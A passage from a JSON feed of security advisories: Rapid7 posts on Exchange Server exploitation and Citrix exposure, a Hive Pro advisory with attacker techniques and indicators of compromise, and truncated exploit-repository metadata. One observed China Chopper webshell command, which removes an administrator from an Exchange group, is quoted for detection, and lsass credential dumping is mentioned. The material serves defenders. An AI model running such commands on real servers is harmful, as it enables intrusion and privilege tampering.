Microsoft has also released [an updated script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that scans Exchange log files for IOCs associated with the vulnerabilities disclosed on March 2, 2021.", "cvss3": {}, "published": "2021-03-03T19:23:42", "type": "rapid7blog", "title": "Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T19:23:42", "id": "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "href": "https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-02T21:07:58", "description": "\n\n_The following blog post was co-authored by Andrew Christian and Brendan Watters._\n\nBeginning Feb. 27, 2021, [Rapid7\u2019s Managed Detection and Response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) team has observed a notable increase in the automated exploitation of vulnerable Microsoft Exchange servers to upload a webshell granting attackers remote access. The suspected vulnerability being exploited is a [cross-site request forgery (CSRF) vulnerability](<https://www.rapid7.com/fundamentals/cross-site-request-forgery/>): The likeliest culprit is [CVE-2021-24085](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24085>), an Exchange Server spoofing vulnerability released as part of Microsoft\u2019s February 2021 Patch Tuesday advisory, though other CVEs may also be at play (e.g., CVE-2021-26855, CVE-2021-26865, CVE-2021-26857).\n\nThe following China Chopper command was observed multiple times beginning Feb. 27 using the same DigitalOcean source IP (165.232.154.116):\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nExchange or other systems administrators who see this command\u2014or any other China Chopper command in the near future\u2014should look for the following in IIS logs:\n\n * 165.232.154.116 (the source IP of the requests)\n * `/ecp/y.js`\n * `/ecp/DDI/DDIService.svc/GetList`\n\nIndicators of compromise (IOCs) from the attacks we have observed are consistent with IOCs for [publicly available exploit code targeting CVE-2021-24085](<https://github.com/sourceincite/CVE-2021-24085>) released by security researcher [Steven Seeley](<https://twitter.com/steventseeley>) last week, shortly before indiscriminate exploitation began. After initial exploitation, attackers drop an ASP eval webshell before (usually) executing `procdump` against `lsass.exe` in order to grab all the credentials from the box. It would also be possible to then clean some indicators of compromise from the affected machine[s]. We have included a section on CVE-2021-24085 exploitation at the end of this document.\n\nExchange servers are frequent, [high-value attack targets](<https://attackerkb.com/search?q=exchange>) whose patch rates often [lag behind attacker capabilities](<https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/>). Rapid7 Labs has identified nearly 170,000 Exchange servers vulnerable to CVE-2021-24085 on the public internet:\n\n\n\n**Rapid7 recommends that Exchange customers apply Microsoft\u2019s February 2021 updates immediately.** InsightVM and Nexpose customers can [assess their exposure to CVE-2021-24085](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-24085/>) and other February Patch Tuesday CVEs with vulnerability checks. InsightIDR provides existing coverage for this vulnerability via our out-of-the-box China Chopper Webshell Executing Commands detection, and will alert you about any suspicious activity. [View this detection](<https://docs.rapid7.com/insightidr/windows-suspicious-process/#attacker-tool>) in the Attacker Tool section of the InsightIDR Detection Library.\n\n## CVE-2021-24085 exploit chain\n\nAs part of the [PoC](<https://github.com/sourceincite/CVE-2021-24085>) for CVE-2021-24085, the attacker will search for a specific token using a request to `/ecp/DDI/DDIService.svc/GetList`. If that request is successful, the PoC moves on to writing the desired token to the server\u2019s filesystem with the request `/ecp/DDI/DDIService.svc/SetObject`. At that point, the token is available for downloading directly. The PoC uses a download request to `/ecp/poc.png` (though the name could be anything) and may be recorded in the IIS logs themselves attached to the IP of the initial attack.\n\nIndicators of compromise would include the requests to both `/ecp/DDI/DDIService.svc/GetList` and `/ecp/DDI/DDIService.svc/SetObject`, especially if those requests were associated with an odd user agent string like `python`. Because the PoC utilizes aSetObject to write the token o the server\u2019s filesystem in a world-readable location, it would be beneficial for incident responders to examine any files that were created around the time of the requests, as one of those files could be the access token and should be removed or placed in a secure location. It is also possible that responders could discover the file name in question by checking to see if the original attacker\u2019s IP downloaded any files.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-02T19:53:28", "type": "rapid7blog", "title": "Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2021-03-02T19:53:28", "id": "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "href": "https://blog.rapid7.com/2021/03/02/indiscriminate-exploitation-of-microsoft-exchange-servers-cve-2021-24085/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-11-04T16:45:52", "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## Citrix ADC/NetScaler (TCP/Various)\n\n_It's like VNC, but like if Plan9 ever escaped Bell Labs and got super popular._\n\n### TLDR\n\n**WHAT IT IS:** A client/server technology\u2014similar to Microsoft Remote Desktop\u2014that provides remote access to applications and/or entire operating systems desktop environments.\n\n**HOW MANY: **62,998 discovered nodes. 62,998 (100%) have Recog service version fingerprints\n\n**VULNERABILITIES: **Tons! Most recently, a [severe, unauthenticated remote code execution vulnerability](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>) has been widely exploited since January 2020.\n\n**ADVICE: **Use it! But, keep it patched and use multi-factor authentication.\n\n**ALTERNATIVES: **Microsoft Remote Desktop, VNC, and other similar solutions used behind a well-oiled VPN.\n\nCitrix was founded in 1989 and has a diverse array of remote access solutions over the years. Modern Citrix ADC (application delivery controller) and NetScaler solutions use the Microsoft Remote Desktop Services infrastructure to deliver virtual applications and desktops to remote users. Organizations have the ability to configure stronger access controls than with vanilla Remote Desktop, and there are other optimizations within the Citrix application delivery process that also make it faster and consume less bandwidth than raw Remote Desktop sessions.\n\n### Discovery details\n\nIdentifying Citrix systems on the internet turns out to be pretty easy, since their HTTP and NTP servers [kind of go out of their way](<https://github.com/rapid7/recog/search?q=citrix&unscoped_q=citrix>) to proudly let you know they are, indeed, Citrix systems. This makes it easy for Rapid7 Labs researchers to track the spread of Citrix systems on the internet, and in March 2020, we also developed a method to fingerprint the server version based on the version fingerprint of the Citrix client that is offered for download (again, Citrix going out of its way to help folks identify their systems).\n\nThe Labs team spent time on this effort because attackers keep compromising systems that haven\u2019t patched a [gnarly remote code execution vulnerability](<https://attackerkb.com/topics/x22buZozYJ/cve-2019-19781>), and we have many in-flight projects set up to model patch adoption rates of various technologies.\n\nUnlike many other top 10 country lists in this report, China failed to even beat out Sweden in their internet-facing exposure of Citrix systems.\n\n\n\nThe lack of Citrix in cloud environments makes sense, since this technology is usually associated with virtual desktop infrastructure (VDI), which is almost exclusively found in enterprise/business environments.\n\n### Exposure information\n\nWith an actively exploited vulnerability in play and [regular government warnings](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) about the situation, you\u2019d likely guess that internet-facing Citrix servers were fully patched or had mitigations in place. And, you\u2019d be wrong (again), but this time, the situation isn\u2019t as grim as you might expect.\n\n\n\nOur version fingerprinting technique showed that 73% of internet-facing Citrix systems have patches or mitigations in place, with the remaining 27% either being vulnerable or woefully outdated (thus having other issues to worry about). It has taken five months to get to a patch rate of 73%.\n\n### Attacker\u2019s view\n\nThe vast majority of our Heisenberg honeypot nodes are in cloud environments, and\u2014as we\u2019ve just seen\u2014clouds are not where Citrix tends to live (at least on public internet cloud segments). Back in January, we caught attackers and researchers looking for exploitable systems quite regularly, but that activity has waned (though it hasn\u2019t stopped).\n\n\n\nOur honeypots do not emulate Citrix, so the lack of activity is more likely due to our nodes being ignored after each attacker inventory scan. Attackers may also be reusing initial inventory lists or have already established a foothold on the thousands of systems that took forever to be patched.\n\n### Our advice\n\n**IT and IT security teams **should relentlessly monitor vendor bulletins and CVE reports and patch Citrix environments as soon as possible. With attackers increasingly targeting remote access technologies over the past 18 months, it would also be a good idea to have enhanced monitoring with more detailed logging set up on these systems. \n\n**Cloud providers** likely can just keep doing what they\u2019re doing with regard to Citrix since it does not seem to be widely used, despite [Citrix-provided solutions](<https://www.citrix.com/global-partners/amazon-web-services/citrix-workspace-on-aws.html>) for these environments.\n\n**Government cybersecurity agencies **should keep up the great work they\u2019ve been doing calling attention to threat actor activity and the severity of vulnerabilities in remote access technologies like Citrix.\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)", "cvss3": {}, "published": "2020-11-04T15:24:04", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of Citrix ADC/NetScaler", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-11-04T15:24:04", "id": "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "href": "https://blog.rapid7.com/2020/11/04/nicer-protocol-deep-dive-internet-exposure-of-citrix-adc-netscaler/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nMicrosoft Exchange Server vulnerabilities have been officially patched for five months now. These vulnerabilities are actively exploited by multiple threat actors named DeadRinger. DeadRinger has been affecting the telecommunication industry all around the world. DeadRinger consists of three clusters. The first one includes threat group Softcell which has been active since 2012. The Naikon group, which has been active since 2020, is the second cluster. We discovered that the signatures match those of TG-3390, making it the third cluster.\n\nAs a response, Hive Pro Threat Researchers advises that you address these vulnerabilities.\n\nThe Techniques used by the DeadRinger includes: \nT1592: Gather Victim Host Information \nT1595: Active Scanning \nT1590: Gather Victim Network Information \nT1190: Exploit Public-Facing Application \nT1059: Command and Scripting Interpreter \nT1047: Windows Management Instrumentation \nT1059.001: Command and Scripting Interpreter: PowerShell \nT1505.003: Server Software Component: Web Shell \nT1136: Create Account \nT1053: Scheduled Task/Job \nT1078: Valid Accounts \nT1574: Hijack Execution Flow \nT1027.005: Obfuscated Files or Information: Indicator Removal from Tools \nT1027: Obfuscated Files or Information \nT1036: Masquerading \nT1070.006: Indicator Removal on Host: Timestomp \nT1140: Deobfuscate/Decode Files or Information \nT1040: Network Sniffing \nT1087: Account Discovery \nT1018: Remote System Discovery \nT1071.001: Application Layer Protocol: Web Protocols \nT1041: Exfiltration Over C2 Channel \nT1021.002: Remote Services: SMB/Windows Admin Shares \nT1550.002: Use Alternate Authentication Material: Pass the Hash \nT1105: Ingress Tool Transfer \nT1555: Credentials from Password Stores \nT1003: OS Credential Dumping \nT1016: System Network Configuration Discovery \nT1069: Permission Groups Discovery \nT1560: Archive Collected Data \nT1569: System Services \nT1543.003: Create or Modify System Process: Windows Service \nT1574.002: Hijack Execution Flow: DLL Side-Loading \nT1570: Lateral Tool Transfer \nT1056.001: Input Capture: Keylogging \nT1573: Encrypted Channel\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 47.56.86[.]44 \n45.76.213[.]2 \n45.123.118[.]232 \n101.132.251[.]212 \nSHA-1 Hash | 19e961e2642e87deb2db6ca8fc2342f4b688a45c \nba8f2843e2fb5274394b3c81abc3c2202d9ba592 \n243cd77cfa03f58f6e6568e011e1d6d85969a3a2 \nc549a16aaa9901c652b7bc576e980ec2a008a2e0 \nc2850993bffc8330cff3cb89e9c7652b8819f57f \n440e04d0cc5e842c94793baf31e0d188511f0ace \ne2340b27a4b759e0e2842bfe5aa48dda7450af4c \n15336340db8b73bf73a17c227eb0c59b5a4dece2 \n5bc5dbe3a2ffd5ed1cd9f0c562564c8b72ae2055 \n0dc49c5438a5d80ef31df4a4ccaab92685da3fc6 \n81cfcf3f8213bce4ca6a460e1db9e7dd1474ba52 \ne93ceb7938120a87c6c69434a6815f0da42ab7f2 \n207b7cf5db59d70d4789cb91194c732bcd1cfb4b \n71999e468252b7458e06f76b5c746a4f4b3aaa58 \n39c5c45dbec92fa99ad37c4bab09164325dbeea0 \nefc6c117ecc6253ed7400c53b2e148d5e4068636 \na3c5c0e93f6925846fab5f3c69094d8a465828e9 \na4232973418ee44713e59e0eae2381a42db5f54c \n5602bf8710b1521f6284685d835d5d1df0679b0f \ne3fcda85f5f42a2bffb65f3b8deeb523f8db2302 \n720556854fb4bcf83b9ceb9515fbe3f5cb182dd5 \nb699861850e4e6fde73dfbdb761645e2270f9c9a \n6516d73f8d4dba83ca8c0330d3f180c0830af6a0 \n99f8263808c7e737667a73a606cbb8bf0d6f0980 \na5b193118960184fe3aa3b1ea7d8fd1c00423ed6 \n92ce6af826d2fb8a03d6de7d8aa930b4f94bc2db \nd9e828fb891f033656a0797f5fc6d276fbc9748f \n87c3dc2ae65dcd818c12c1a4e4368f05719dc036 \nDomain | Cymkpuadkduz[.]xyz \nnw.eiyfmrn[.]com \njdk.gsvvfsso[.]com \nttareyice.jkub[.]com \nmy.eiyfmrn[.]com \nA.jrmfeeder[.]org \nafhkl.dseqoorg[.]com \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>\n\n#### References\n\n<https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos>\n\n<https://www.zdnet.com/article/deadringer-chinese-apts-strike-major-telecommunications-companies/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T11:01:05", "type": "hivepro", "title": "Have you patched the vulnerabilities in Microsoft Exchange Server?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-08-18T11:01:05", "id": "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "href": "https://www.hivepro.com/have-you-patched-the-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-15T15:36:14", "description": "# CVE-2021-26855_SSRF\nCVE-2021-26855 Exchange ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T07:28:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855", "CVE-2021-26865", "CVE-2021-26858"], "modified": "2021-12-15T14:41:36", "id": "35B21CE7-1E51-5824-B70E-36480A6E8763", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T13:06:47", "description": "# HAFNIUM-IOC\nHafnium-IOC is a simple PowerShell script that run...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T17:36:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26858", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2022-01-12T11:59:39", "id": "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:04", "description": "# Exchange_IOC_Hunter\n\n#### Description:\n\nHunt for IOCs in IIS L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T10:36:44", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26855"], "modified": "2021-03-17T10:22:07", "id": "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-15T01:18:31", "description": "### This project has been discontinued\n\nPlease use Microsoft too...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-05T08:22:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-26857", "CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-02-14T23:14:09", "id": "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:20", "description": " contains a remote co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-27T02:28:48", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-05-27T14:19:48", "id": "CF2E9209-48FF-5375-8638-93E7CC964EB3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:14:58", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-11T20:38:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-01-22T10:33:16", "id": "4BE00B6F-1555-52F8-948D-D2F52AEC2DC7", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-26T21:20:59", "description": "# CVE-2021-21985 (Vulnerable Code) \n\n script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "E90678A1-4183-5E58-A4E2-5E48E8767D92", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:28:09", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "7CEBB62C-173B-50CD-A252-B6522523EE57", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:21:32", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": 